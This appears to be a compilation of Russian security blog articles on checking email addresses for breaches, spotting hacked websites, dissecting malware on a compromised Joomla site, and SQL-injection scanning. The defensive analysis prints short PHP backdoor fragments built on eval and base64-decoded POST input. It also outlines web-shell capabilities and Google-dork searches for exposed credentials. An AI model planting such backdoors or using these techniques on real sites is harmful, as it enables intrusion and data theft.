Как проверить почту на взлом? Проверка сайта на взлом


Сайт проверки почты на взлом HaveIBeenPwned. База данных взломанных сайтов

Как проверить свою почту на угон, находиться ли она в базах данных взломанных сайтов?

В последние годы было много случаев взлома сайтов, после которых в сеть попало большое количество логинов и паролей пользователей. Мы даже когда-то делали анализ украденной х@керами базы mail.ru и выясняли, какие самые распространенные пароли используют пользователи популярного почтового сервиса для того, чтобы пользователи на чужих ошибках поняли, что такое плохой и хороший пароль.

А с помощью сервиса «Panopticlick» вы можете определить оставляет ли ваш браузер цифровой след в сети интернет по которому вас можно вычислить.

Сайт проверки почты на взлом

Сегодня я хочу рассказать о специальном онлайн-сервисе, который содержит информацию о всех ранее взломанных веб-сайтах, базы данных которых попали в сеть. С помощью данного  сайта вы можете узнать находится ли ваш почтовый ящик в одной из украденных баз данных. Сайт называется HaveIBeenPwned (был ли я взломан). Термин Pwned (You have been pwned!) переводится как «Тебя отымели». Данный термин изначально использовался х@керами, а позже геймерами.

Haveibeenpwned: Сайт проверки почты на взлом

Кроме этого вы можете узнать информацию о каждом отдельном взломе. В списке сервиса большое количество взломанных когда-либо сайтов, таких как: mail.ru, спрашивай.ру. yandex.ru, forbes, yahoo, snapchat и т.д.

Информация о взломe сайта Спрашивай.ру

Автором сайта является некий Австралиец. Сайт работает с 2013 года.

Проверка почты на взлом

Для проверки почты, необходимо зайти на сайт HaveIBeenPwned и в верхней части экрана в строке поиска ввести адрес вашего е-mail или имя пользователя которое вы обычно используете для регистрации на сайтах. В случае, если ваш почтовый ящик был засвечен, вы увидите подробную информацию о том на каком сайте, когда и кем был произведен взлом и использован ваш e-mail.

Сайт проверки почты на взлом

Что делать если e-mail в базе данных

Нечего страшного. Удалите конфиденциальную переписку, смените пароль e-mail и пароли аккаунтов которые зарегистрированы на эту почту на другой более надежный. Не забудьте воспользоваться советами для создания правильного пароля. О том как правильно создать хороший пароль мы рассказывали в статье «Как создать надежный пароль». И обязательно добавьте информацию в случае потери доступа, такую как дополнительный адрес или номер вашего мобильного телефона.

Проверка сервиса HaveIBeenPwned

Перед тем как рассказать вам про этот сервис я решил проверить его на вшивость. Создал почтовый ящик с многообещающим и заманчивым названием, с довольно легким для брута паролем и два месяца назад использовал сервис введя в строку поиска именно эту почту. После этого я конечно нигде его не светил.

Чего я хотел добиться? Я хотел две вещи, чтоб его взломали (да бывает и такое) или чтоб на него полился спам. К сожалению или к счастью нечего такого не произошло, и это говорит о том, что владелец данного сайта не использует почту пользователей для корыстных целей. Возможно вы не знаете, но многие сайты, даже белые сайты, предлагают вам подписаться на рассылку, а потом сливают другим (конечно за денюжку) свою базу подписчиков, для спама и других мерзопакостных вещей. Почему мерзопакостных, да потому что нет нечего хуже чем обманывать людей, которые тебе доверяют, которые посещают твой сайт и на которых зарабатываются деньги.

www.spy-soft.net

Как по косвенным признакам определить, что сайт взломали

Совсем не обязательно выполнять сканирование сайта на наличие вредоносного кода и вирусов для того чтобы диагностировать взлом сайта. Существует ряд косвенных признаков, которые с разной степенью достоверности могут подсказать, что с сайтом не все в порядке и владельцу сайта необходимо заняться вопросами безопасности и защиты своего ресурса.

Ниже перечислим наиболее полный список косвенных признаков, по которым можно определить, что сайт был взломан или к сайту имеется несанкционированный административный доступ.

  1. Резко упала посещаемость сайта
  2. При заходе на сайт с мобильного устройства происходит редирект на другой сайт, переход в AppStore, или браузер предлагает скачать (обновить) какое-то приложение
  3. На сайте появляются всплывающие окна, тизерные блоки, контекстная  реклама, которые вы не размещали
  4. В статистике посещений регулярно появляются переходы на сайты, при этом на них нет явных ссылок на страницах
  5. При клике по локальным ссылками выполняется переход на сторонний ресурс или открывается новое окно с чужим сайтом
  6. На сайте появился посторонний контент (новые статьи, фрагменты страниц, разделы, пункты меню), который вы не размещали
  7. На страницах появились ссылки на сторонние ресурсы. Иногда ссылки не видны на самой странице, но есть в коде страницы или детектируются внешними сервисами
  8. Сайт теряет позиции в поисковой выдаче
  9. В поисковом индексе (в панели вебмастера) появилось много новых страниц, которые вы не добавляли
  10. В поисковой выдаче сайт отображается с предупреждением о наличие и распространении вредоносного кода
  11. Странные заходы на сайт в статистике посещений (большое число посетителей, не задерживающихся на странице больше 1 секунды)
  12. Жалобы пользователей на вредоносный код, ненадлежащий контент или недобросовестную рекламу на страницах
  13. Срабатывает десктопный или мобильный антивирус (на наличие вируса или “взрослого” контента)
  14. Извещение от хостинга о наличие вредоносного кода в скриптах, спам-рассылки с сайта или высокой нагрузке
  15. Тех поддержка рекламной сети (Яндекс.Директ, Google Adwords) указывает на присутствие вредоносного кода на сайте

Если до настоящего момента вы не задумывались о безопасности сайта, рекомендуем вам выполнить ряд простых действий, которые позволят провести быструю диагностику:

  1. добавить сайт в панель вебмастера Яндекса и Гугла, проверить в них количество проиндексированных страниц, предупреждения о наличие вредоносного кода, количество внешних ссылок
  2. разместить на сайте счетчики посещений liveinternet, Яндекс.Метрики и посмотреть статистику переходов на другие сайты за неделю, среднее время просмотра страниц и т.п.
  3. зайти на сайт с различных мобильных устройств, проверив на редиректы или воспользоваться сервисом http://zorrobot.ru/tool/yago.php
  4. просканировать сайт сервисами определения внешних ссылок
  5. добавить сайт в популярные биржи ссылок sape/trustlink/mainlink/linkfeed/setlink, чтобы за вас это не сделал хакер
  6. посмотреть исходный код страниц сайта на наличие постороннего кода, скрытых ссылок, скриптов или iframe вставок (можно создать локальную копию сайта с помощью программы Teleport Pro и сделать поиск по IFRAME вставкам или подозрительным ссылкам из статистики посещений)

Более опытные вебмастера могут также

  1. просканировать сайт скриптом AI-Bolit (revisium.com/ai/)  
  2. сохранить дамп базы данных и выполнить поиск по фрагментам <script и <iframe
  3. проверить куки, которые выставляются после серфинга по сайту
  4. в инструменте разработчика браузеров Chrome, IE11 или Firefox посмотреть список скриптов, которые загружаются на страницах сайта и домены, с которых они загружаются

Если вы нашли один или несколько перечисленных признаков на вашем сайте, не стоит паниковать и делать поспешные выводы, так как часть из них может быть не связана напрямую со взломом сайта. Для начала необходимо тщательно диагностировать проблему. Если “ругается” антивирус или поисковая система, запросите детали в вирусной лаборатории или тех поддержке сервиса. Если жалуются пользователи, попросите их прислать скриншоты страниц с рекламой или сообщением антивируса. Если вы обнаружили чужой контент на страницах сайта – проверьте базу данных и шаблоны на наличие постороннего html кода или скриптов. Также рекомендуем проверить сайт сканером вредоносного кода, чтобы быть уверенным, что на сайте нет вирусов, хакерских шеллов и бэкдоров. Переходы на чужие сайты или подозрительные ссылки на страницах стоит проверять на разных компьютерах и мобильных устройствах и в нескольких браузерах. Иногда их причиной может быть установленные плагины в браузере или наличие adware (рекламное ПО) на компьютере пользователя.

Если вы затрудняетесь выполнить диагностику или лечение сайта самостоятельно, обратитесь к профессионалам.

Обсуждаем и комментируем

revisium.com

что скрывается внутри взломанного сайта

или «препарируем» среднестатистический взломанный сайт на Joomla

Взлом сайта не всегда можно распознать по внешним признакам  (мобильный редирект, спам-ссылки на страницах, чужие баннеры, дефейс и пр). При компрометации сайта этих внешних признаков может и не быть. Ресурс может работать в штатном режиме, без перебоев, ошибок и попадания в “черные” списки антивирусов. Но это отнюдь не означает, что сайт в безопасности. Проблема в том, что заметить факт взлома и загрузки хакерских скриптов без проведения аудита – сложно, а сами веб-шеллы, бэкдоры и другие инструменты хакера могут достаточно долго находиться на хостинге и не использоваться по назначению. Но однажды наступает момент, и они начинают сурово эксплуатироваться злоумышленником, в результате чего у владельца сайта возникают проблемы. За спам, размещение фишинговых страниц сайт блокируют на хостинге (или отключают часть функционала), а появление редиректов или вирусов на страницах чревато баном со стороны антивирусов и санкциями со стороны поисковых систем. В подобном случае необходимо в срочном порядке “лечить” сайт, а затем ставить защиту от взлома, чтобы сюжет не повторялся.

К сожалению, хакерские скрипты по внешним признакам или внешними сканерами не обнаруживаются. Поэтому ни антивирусы поисковых систем, ни антивирусное ПО, установленное у веб-мастера на компьютере, не сообщит о проблемах безопасности сайта. Если скрипты размещены где-нибудь в системных каталогах сайта (не в корневом и не в images) или инжектированы в существующие скрипты, случайно заметить их также не удастся.

Узнать о взломе в подобных случаях можно только от технической поддержки хостинга (который время от времени проверяет файлы на вирусы) или самостоятельно, проверив сайт специализированными сканерами вредоносных и хакерских скриптов (AI-BOLIT, ClamAv, Maldet,…).

Как гласит античная мудрость: “предупрежден - значит вооружен“. Для того чтобы представлять себе “масштаб бедствия” при взломе, предлагаем познакомиться со среднестатистическим сайтом на Joomla, который был взломан в результате проведения нецелевой атаки, посмотреть, что именно хакеры загрузили на сайт и какую угрозу загруженные скрипты несут сайту, его владельцу и хостингу.

Пример, который разбирается в статье - реальный, а сам инцидент произошел летом 2015 года.   

Итак, сайт работает на Joomla версии 2.5.28. Причина обращения – блокировка сайта со стороны хостинга за спам-рассылку. Кроме анализа логов почтового и веб-сервера, сайт был просканирован тремя популярными решениями для обнаружения вредоносного кода на хостинге: AI-BOLIT, Maldet и ClamAv.

 Результат AI-BOLIT’а: 206 вредоносных скриптов.

 

Результат Maldet: 84 вредоносных файла

 

Результат ClamAv: 67 вредоносных файлов

 

Мы также запросили исходный вариант сайта у разработчиков и сравнили файлы с помощью системы контроля версий git. По результатам сравнения и проверки обнаруженных файлов выяснилось, что AI-BOLIT немного перестарался, то есть обнаружил все вредоносы + около 15% было “false positive” (ложных срабатываний). Clamav и Maldet обнаружили только половину всех вредоносов,  поэтому можно сделать вывод, что данные антивирусы подходят только для экспресс-проверки на заражение, но не подходят для “лечения” сайта. При “лечении” должны быть обнаружены и удалены все вредоносные и хакерские скрипты. Если останется хотя бы один бэкдор или веб-шелл, сайт взломают повторно. 

После проведенного анализа мы разобрали функционал обнаруженных “вредоносов” и классифицировали их. Результат в таблице:

При нецелевом взломе хорошо прослеживаются паттерны заражения, то есть наличие однотипных вредоносных и хакерских скриптов, случайно разбросанных по каталогам сайта или внедренных в файлы .php. Число скриптов каждого вида, их код может немного отличаться от заражения к заражению за счет обфускации и шифрования, но функционал каждого вида сохраняется. Кстати, время от времени в паттерн добавляется новый вид бэкдоров. Еще год назад не было №2 и №5.

Данный паттерн заражения характерен для CMS Joomla, Wordpress, и некоторых коммерческих CMS.

Давайте рассмотрим каждый скрипт из данного набора.

Номер 1 – бэкдор, который инжектируется (внедряется) в начало случайного файла .php. Код при просмотре не сразу можно заметить, так как он намеренно “отбит” пробельными символами вправо за пределы видимой части экрана (поэтому у нас всегда включен режим “переноса строк” в редакторе).

Данная незамысловатая запись представляет собой вызов:

evаl(bаse64_decоde($_POST[‘n746521’])

То есть будет выполнен произвольный PHP код, который закодирован в base64 и передан в переменную n746521 методом POST.

Насколько опасно для сайта, если данный фрагмент останется в файле? Очень опасно, так как по сути он предоставляет злоумышленнику полный контроль над аккаунтом хостинга: через него можно выполнить любой разрешенный код PHP, создать или загрузить файлы на хостинг, разослать спам, выполнить запросы к базе данных, и многое другое. А еще данный инжект удобен для хакера тем, что не является отдельным скриптом, который можно обнаружить по логам. Запросы с вредоносной нагрузкой могут отсылаться на index.php или любой URL сайта.

Поэтому данный фрагмент нужно вычистить из всех .php файлов (зараженных файлов будет от 5 до 20). У фрагмента меняется имя переменной в апострофах, остальные фрагменты - фиксированы.

Номер 2 – бэкдор-загрузчик. 

Выполняет аутентификацию по передаваемому параметру, далее делает одно из двух

  1. исполняет код, переданный в параметре через @evаl(bаse64_decоde($_POST[“FFSW3525KKSfj”]))
  2. создает файл с именем Ffhwu22313_fff555ffsd.php, сохраняет содержимое в файл и подключает его в бэкдор через @include_once, после чего удаляет. Таким образом обходит ограничение вызова eval, если он, например, заблокирован на хостинге. 

Если скрипт просто открыть в браузере, то отдается статус 404 Страница не найдена. Таким образом бэкдор практически невозможно обнаружить снаружи.

Также как и №1, бэкдор позволяет получить полный контроль над аккаунтом хостинга, а в последствии, возможно, и всем сервером. Но №2 более функционален за счет обхода eval.

Хорошая новость для владельцев сайта в том, что бэкдор размещается в отдельном php скрипте, то есть его можно заметить невооруженным глазом, а также можно найти, используя find … –mtime … и find … -ctime … . Имена файлов – случайные последовательности, которые не встречаются в оригинальной версии CMS, так что при просмотре каталогов пропустить файлы будет сложно.

Номер 3 – это бэкдор-“младший брат” вредоноса №2.

Делает то же самое, но не умеет обходить запрещенный eval, то есть выполняет переданный код только через @evаl(bаse64_decоde($_POST[‘FFSW3525KKSfj’])

Номер 4 – классический WSO веб-шелл.

Веб-шелл – это “кухонный комбайн”, который делает работу хакера удобной на хостинге.

С помощью WSO шелла можно

  1. смотреть конфигурацию хостинга
  2. работать с файлами через удобный файловый менеджер (создавать, удалять, редактировать, скачивать и т.п.)
  3. работать с базой данных (изменять, удалять данные в таблицах и отправлять любые SQL запросы)
  4. выполнять различные строковые преобразования (кодировать, декодировать строковые значения)
  5. подбирать пароли (брутфорс)
  6. выполнять команды в режиме командной строки
  7. выполнять произвольный код PHP
  8. управлять сайтом (например, вставлять вирусный код в базу или файлы javascript) удаленно и автоматизированно

Если убрать деструктивный функционал, то данным инструментом могли бы пользоваться и рядовые веб-мастера. Иногда нам кажется, что функционал панелей управления некоторых хостингов заметно уступают возможностям веб-шеллов.

Номер 5 – дорвей, загружающий контент с удаленного сервера

Если его немного расшифровать, можно увидеть, с какого IP грузится контент и каким User Agent он “прикидывается”:

Дорвей генерирует тысячи страницы из разряда “черного SEO”. Страницы попадают в поисковый индекс и пагубно влияют на поисковую выдачу сайта, оригинальные страницы которого пессимизируются. Сайт может попасть под фильтр или полностью вылететь из поисковой выдачи.

Номер 6 – бэкдор, который принимает команды в виде зашифрованного серилизованного массива PHP.

Управляющие команды могут передаваться через POST переменные или COOKIE.

Бэкдор поддерживает команды:

  1. “i” – выдать версию PHP и версию бэкдора
  2. “e” – выполнить eval($data[“d”]) для кода, который передан в запросе

Фрагмент расшифрованного варианта данного бэкдора перечислен ниже.

Номер 7 – еще один бэкдор, который может размещаться как в отдельном файле размером до 400 байтов, так и инжектироваться в скрипты php. Является упрощенным вариантом №1  с теми же пагубными последствиями.

Номер 8 – дроппер руткита Mayhem. Это, пожалуй, самая опасная “нагрузка” в данном заражении.

Руткит Mayhem - серьезный вредонос для веб-серверов на ОС *nix, который превращает сервер в боевую единицу ботнета, но может работать в условиях ограниченных привилегий.

Задача данного файла сгенерировать руткит и загрузить его через LD_PRELOAD. Подробный разбор дроппера можно посмотреть по ссылке и в отчете Яндекса.

Номер 9 – мощный спам-рассыльщик.

Богатый функционал позволяет рассылать спам как через стандартную функцию mail(), так и с помощью SMTP протокола через сокеты. Поддерживаются различные шаблоны писем, рассылка по списку и пр. Исходный код хорошенько обфусцирован. Фрагмент третьего шага деобфускации выглядит так:

Номер 10 – дроппер, задача которого загрузить с удаленного сервера исполняемый шелл-файл, запустить его и по завершении удалить. С этого скрипта обычно начинается взлом сайта.

Сайт, с которого дроппер загружает шелл, также взломанный.  В данном случае он используется в качестве хостинга вредоносного кода. Спустя несколько часов шелл-файл по данному адресу перестает быть доступен, поэтому определить, какой именно код выполнялся при загрузке не представляется возможным.

Итак, мы рассказали про все хакерские скрипты из данного паттерна заражения, среди которых оказались

  1. несколько видов бэкдоров
  2. спам-рассыльщик
  3. дорвей
  4. веб-шелл
  5. дроппер руткита

Как можно заметить, здесь нет ни одного вируса или редиректа, то есть сайт после взлома не начал распространять вредоносный код, перенаправлять посетителей, показывать баннеры, не появилось фишиновых страниц и т.п. и «снаружи» заметить взлом можно было только спустя пару месяцев, когда в поисковый индекс попадут дорвей-страницы.

Такой сайт бесполезно сканировать внешними антивирусами и антивирусными сервисами, они не покажут факт взлома, поскольку для детектирования хакерских скриптов нужно иметь доступ к файлам сайта. Поэтому первым, кто сможет сообщить владельцу сайта о факте взлома, скорее всего будет хостер. Сигналом администратору хостинг-компании для проверки сайта на взлом послужит рассылка спама с сервера (в нашей практике чаще всего встречается именно этот вариант). После сканирования аккаунта антивирус на хостинге обнаружит половину из перечисленных выше «вредоносов» (пару типов бэкдоров, руткит и спам-рассыльщик) и если владелец сайта удалит только перечисленные в антивирусном отчете скрипты, то взлом повторится и сайт снова заблокируют.  Поэтому в подобных случаях следует пользоваться механизмом проверки целостности файлов аккаунта (если, конечно, веб-мастер позаботился об этом заранее), выполнять полное сканирование, и удалять все вредоносные скрипты, а затем ставить защиту от взлома средствами операционной системы и веб-сервера. 

В качестве рекомендации по безопасности сайта рекомендуем

  1. использовать механизм integrity check (контроля целостности) или хотя бы сделать эталонный “снимок” файловой системы (список файлов, атрибутов и метаданных)
  2. регулярно проверять сайты сканерами вредоносного кода, чтобы обнаруживать проблему до того, как ее обнаружит хостер.

Напоследок хотелось бы отметить, что разобранный в статье пример не является каким-то особо сложным и коварным следствием взлома сайта. На большинстве сайтов, взломанных в результате нецелевой атаки, наблюдается примерно то же самое.

Хорошая новость в том, что теперь вы знаете, с чем придется иметь дело. Как гласит мудрость  - “предупрежден - значит вооружен“.

Обсуждаем и комментируем

revisium.com

Как проверить почту на взлом?

Трудно подсчитать сколько почтовых сервисов и социальных сетей было взломано за последние несколько лет. Еще труднее подсчитать сколько людей пострадало. О некоторых взломах мы узнаем через много времени. Например, о том, что данные миллиарда пользователей утекли из, казалось бы, очень надежной Yahoo!, сама компания узнала от правоохранительных органов через 3,5 года. Можно только догадываться сколького мы еще не знаем.

Многие из нас замечают, что чем старше почтовый ящик, тем больше приходит спама. Всё логично: мы даем адрес почты при регистрации на многих сайтах, делимся с друзьями и коллегами для того, чтобы нам писали. Чем больше круг людей, которые знают почтовый ящик, тем выше вероятность того, что он окажется в спамерских базах данных.

Проверить был ли почтовый ящик взломан можно на сайте HaveIBeenPwned (был ли я взломан). Это онлайн-сервис, который работает с 2013 года. Его создал австралиец. Сайт содержит информацию о всех взломах, произошедших ранее и базы данных которых попали в сеть. Здесь можно узнать попал ли почтовый ящик в одну из украденных баз. Здесь же можно найти подробную информацию о каждом из взломов или другой утечке данных. К чести автора: он не использует полученные данные, так как сайт неоднократно проверялся на использование введенных чистых данных и не разу не было замечено мошенничества в отношении последних.

Проверка почтового адреса на наличие во взломанных базах

Для проверки необходимо зайти на сайт HaveIBeenPwned и в центре экрана ввести почтовый адрес или имя пользователя, которое используется для входа на сайты и сервисы, затем нажать на кнопку pwned справа или Enter на клавиатуре. Если проверочный почтовый ящик или логин пользователя находятся во взломанных базах данных, появится информация на каком сайте, когда, кем был произведен взлом.

Что же делать, если почтовый ящик засвечен:

  • Сменить пароль на почтовый ящик или аккаунт, который засвечен. А также изменить все пароли, которые приходили на указанный e-mail;
  • Удалить и в дальнейшем не держать конфиденциальную информацию на таких ресурсах.

СВами

opencentr.ru

Что должен уметь качественный сервис диагностики сайтов на вирусы и взлом

В сети можно найти много сервисов, которые обещают поиск вирусов и вредоносного кода на сайте. Эти сервисы используют внешнее сканирование сайта без доступа к хостингу. То есть для проверки нужен только адрес сайта. Сервис проверяет страницы сайта на вредоносные вставки, подозрительные фрагменты кода, редиректы и т.п. и выдает отчет, что он обнаружил плохого.

С одной стороны, это удобно и доступно, так как можно оперативно проверить сайт на вирусы прямо в браузере и не нужно предоставлять доступы третьим лицам. Но с другой стороны, с помощью подобных сканеров можно определить только последствия взлома и компрометации ресурса. То есть уже конкретные проявления вредоносной активности: размещенный вирусный код, перенаправление мобильных пользователей, загрузку вредоносного приложения, фишинговые страницы, дефейс и т.п. А вот хакерские шеллы, бэкдоры, спам-рассыльщики и другие скрипты, которые внешне себя не проявляют, с помощью подобных веб-сканеров не найти. Но для быстрой диагностики сайта этого может и не требоваться.

Выясним, какими критериями должны обладать качественные сервисы поиска вирусов на сайте и почему.

  1. Выполнять статическую и динамическую проверку страниц, потому что вирусы – это не только фиксированные инжекты в коде страницы, но и вставки, которые могут появляться эпизодически, или только для конкретных браузеров, или только при переходе с поисковой системы, или по каким-то другим причинам. В последнее время происходит перенаправление посетителей на вирусные сайты или сайты wap-click партнерок, при этом перенаправление выполняется с помощью javascript кода, который сработает только в браузере и только при определенных условиях. Если сервис проверяет одну страницу, да еще и каким-нибудь Curl или file_get_content(), такой редирект поймать не получится. Более продвинутые сервисы подключают PhantomJS, который при диагностике эмулирует браузер посетителя, но и в нем есть много ограничений, которые не позволят определить часть клиентских вредоносных скриптов. Сервис сканирования должен уметь посылать различные диагностические запросы, эмулируя заходы реальных посетителей на проверяемый сайт, отслеживать изменения в коде, что происходит на странице после загрузки, выполнять навигацию, клики и т.п. Только так можно достоверно определить заражение сайта.
  2. Определять вирусы на страницах посредством актуальных сигнатур и свежей базы опасных доменов, потому что сигнатуры быстро устаревают, а разработчики вирусов придумывают различные способы обфускации кода, чтобы они не определялись по сигнатурам. Хороший сервис использует сразу несколько индикаторов вредоносного кода.
  3. Определять вирусы в подгружаемых файлах (ресурсах и скриптах), поскольку вирус может быть не только в самой HTML странице, но и подгружаемых скриптах. Причем скрипты могут загружаться как с домена сайта, так и с внешних сервисов (через серию перенаправлений и javascript-вставок). Поэтому если сканер не умеет проверять динамически-загруженные объекты (скрипты, стили, flash-объекты), то вероятность обнаружения вирусов невелика.
  4. Определять вставки объектов с опасных сайтов в коде страницы и подгружаемых скриптов, потому что для заражения компьютера или мобильного устройства пользователя достаточно загрузки картинки со стороннего сайта, который распространяет вредоносный код. Зная это, антивирусные сервисы ограничивают доступ к веб-ресурсам, если они загружают скрипты, изображения, стили и т.п. с вредоносных сайтов.
  5. Детектировать скрытые мобильные и поисковые редиректы, потому что современные редиректы почти всегда возникают только для посетителей, удовлетворяющих определенным критериям. Например, только если посетитель сайта пришел на страницу с поисковой выдачи, и при этом он пользуется Android устройством и выходит в интернет через 3G/LTE подключение. В других случаях редирект не сработает. Скажем прямо, подобные случаи мало кто умеет детектировать автоматизированными средствами.
  6. Проверять сайт по черным спискам Google Safe Browsing/Безопасного Поиска Яндекса/VirusTotal, потому что если сайт в черном списке, то у него была или есть проблема безопасности.
  7. Определять внешние ссылки и спам-контент, потому что частым следствием взлома является размещение спам-контента на страницах сайта.
  8. Определять опасные виджеты и недобросовестную рекламу, потому что веб-мастера часто не подозревают, что размещенный виджет несет угрозу для посетителей сайта, а при взломе сайта злоумышленник часто внедряет рекламный код какой-нибудь «серой» партнерской программы со скрытыми редиректами на сомнительные ресурсы.
  9. Минимизировать число ложных срабатываний, потому что если сервис бьет тревогу при обнаружении любой IFRAME вставки, то грош цена такому сервису. Нужно уметь отличать зерна от плевел. Например, не считать опасными редиректы на свои же мобильные версии сайтов, редиректы при кликах по внутренним баннерам и т.п.
  10. Разделять угрозы на критические и предупреждения, потому что это, с одной стороны, минимизирует число ложных срабатываний, с другой стороны, позволяет выполнить более тщательную диагностику проблем безопасности и проанализировать подозрительные элементы и ресурсы.
  11. Позволять сохранять результаты и получать к ним доступ по постоянной ссылке, потому что если владелец сайта не смог разобраться с отчетом самостоятельно, он мог бы переслать его специалистам.

К сожалению, ни один из существующих публичных сервисов не удовлетворяет даже половине перечисленных требований, поэтому мы решили сделать достойное решение, которое позволит веб-мастерам, владельцам сайтов и веб-разработчикам оперативно провести диагностику сайтов на вирусы и другие проблемы безопасности, и который будет работать эффективнее всех существующих «проверялок   на вирусы». Представляем вашему вниманию сервис REVIZORRO Scanner (сайт rescan.pro).

Сервис rescan.pro реализован на базе платформы REVIZORRO, которой мы давно пользуемся внутри компании для детектирования проблем безопасности и мониторинга клиентских сайтов. Для REVIZORRO был разработан внешний API интерфейс, и теперь технология доступна всем желающим, а сервис rescan.pro является полнофункциональным публичным сервисом проверки сайтов на вирусы и взлом. 

Примеры отчетов нашего сканера можно посмотреть по ссылкам:

Сервис http://rescan.pro 

 

Обсуждаем и комментируем

revisium.com

Проверка на уязвимость сайта. Бесплатный сканер SQLFury

  • Автор Parser
  • Дата: 20 Июнь 2011

Проверка на уязвимость сайта

Проверка на уязвимость сайта служит профилактирующей мерой против взлома сайта. По статистике с каждым годом увеличивается количество взломов сайтов. Повышенный интерес представляют сайты и блоги с большим количеством посетителей или публикующие на своих страницах свои успехи в заработке (финстрипы). Поэтому пренебрегать безопасностью своих проектов просто непозволительно.Так как большая часть бесплатно распространяющихся  CMS (WordPress, Joomla и др.) содержат различные уязвимости (дыры), поэтому безопасность сайтов на этих CMS недостаточна. Проверка  на уязвимость  сайта просто необходима и ее следует проводить регулярно.

Нужно всегда проверять свой сайт (после изменений в коде или очередного обновления cms) на уязвимость на специальных сервисах (find-xss.net) или с помощью программ ( XSpider, MaxPatrol — платные)  тем более это не займет так много вашего времени, а пользы может принести немало. Бесплатная программа SQLFury проводит тест-проверка на уязвимость сайта от SQL инъекций.

Проверка на уязвимость сайта

Основные возможности программы-сканера SQLFury:

Поддержка баз данных

  • MySQL
  • PostgreSQL
  • Microsoft SQL Server
  • Oracle

Извлечение данных из базы

  • Определяет версию базы данных
  • Определяет пользователя базы данных
  • Определяет всех пользователей из базы данных
  • Определяет имя базы данных
  • имена всех баз данных
  • имена таблиц
  • имена колонок

Атаки с помощью SQL инъекций являются одним из наиболее распространенных видов атак на сайты. Программа SQLFury первая бесплатная программа для возможности  проверить сайт на уязвимость, причем очень быстрая (по ней примерно можно узнать и время загрузки проверяемого сайта). Для работы программы требуется установка приложения Adobe Air, поэтому работает на всех системах. Сделал портабельную версию программы, стало удобно пользоваться.

Еще один бесплатный инструмент для проверки сайта на уязвимость от SQL инъекций- плагин для Firefox- SQL Injection 1.2. Плагин позволяет проверить весь контент на страницах, на наличие SQL инъекций. Рекомендуется всем проверится и если не пройдете тест, то срочно нужно подумать о безопасности своего сайта. 

Скачать SQLFury

Рубрика: Проверка сайта на безопасность

www.websteel.ru

Как взламывают большинство сайтов. Примеры нецелевого взлома.

Мы неоднократно писали о том, что количество сайтов, подвергающихся обезличенным (нецелевым) атакам, в разы превышает количество жертв атак целевых. По нашей статистике, только каждый четвертый сайт злоумышленники взламывают целенаправленно, остальные сайты, поступающие к нам на лечение и защиту, - результат массового взлома и заражения.

Пострадать в результате нецелевой атаки довольно просто: для этого достаточно, не заметить или проигнорировать критическую уязвимость в CMS, шаблонах или плагинах своего сайта. Любая незакрытая брешь – отличный шанс очутиться среди себе подобных «товарищей по несчастью» и прочно закрепиться в хакерской выборке кандидатов для взлома. А в случае «успешной» атаки приготовьтесь к тому, что ваш сайт начнут активно использовать для спам-рассылки, заражения пользователей, хостинга фишинговых страниц, атак на другие сайты или заработка на рекламе. 

Найти сайты (их тысячи) со схожими слабыми параметрами для хакера не составляет большого труда. Информацию об уязвимых сайтах всегда можно пробить по Google Hacking Database (GHD) – базе данных «дорков» - поисковых запросов на мета-языке Google, позволяющих найти сайты, уязвимые к тем или иным атакам по определенным сходными свойствами. Например, хакеры могут найти все проиндексированные в поисковой системе сайты с установленным уязвимым плагином или сайты, которые раскрывают содержимое каталогов, т.е. позволяют просматривать и загружать из них файлы (с паролями, настройками и т.п.)

Если на вашем сайте есть слабое звено и веб-проект уязвим к определенному виду атак, то рано или поздно вас взломают. Это нужно понимать каждому веб-мастеру и владельцу сайта.

Последние, обычно, не верят, что найти и взломать уязвимый сайт можно буквально за пару минут, не имея под рукой никаких специализированных хакерских инструментов. Поэтому в качестве иллюстрации мы приведем простой пример, как, используя возможности Google, злоумышленники находят и взламывают веб-проекты, владельцы которых своевременно не позаботились об их защите или допустили ошибки при настройке хостинга.

В качестве примера рассмотрим “дорк”, который появился в базе Google Hacking Database от 1 сентября 2015 года. Он позволяет найти сайты с открытыми каталогами (в таких каталогах можно не только увидеть листинг служебных файлов, но и просмотреть их содержимое, например, найти пароли).

Отправляем этот запрос в поисковую систему Google и видим список сайтов с открытыми листингами каталогов - это потенциальные жертвы хакера. Выбираем среди найденных сайтов случайный, например, последний в списке.

Кликаем по ссылке - открывается список каталогов, по ним можно «погулять» как в проводнике, и в результате серфинга можно заметить файл serverconfig.xml, который в открытом доступе хранит логины и пароли от базы данных. Учитывая то, что иногда учетные записи совпадают с FTP или SSH, таким образом хакер может получить несанкционированный доступ не только к базе данных, но и всему серверу.

На весь вышеописанный процесс ушло порядка двух минут, у хакера же в «боевых условиях», использующего автоматизированные решения, это занимает еще меньше времени, а счет скомпрометированных ресурсов обычно идет на тысячи.

Обидно оказаться в числе тех, кто превратился в легкую добычу в руках хакера, хотя такой ситуации легко избежать. Думайте о защите своих веб-проектов заранее. Если ваш сайт будет чуть более защищен, чем среднестатистический (с CMS “из коробки” и настройками по-умолчанию), то проблема нецелевого взлома вас обойдет стороной. 

Обсуждаем и комментируем

revisium.com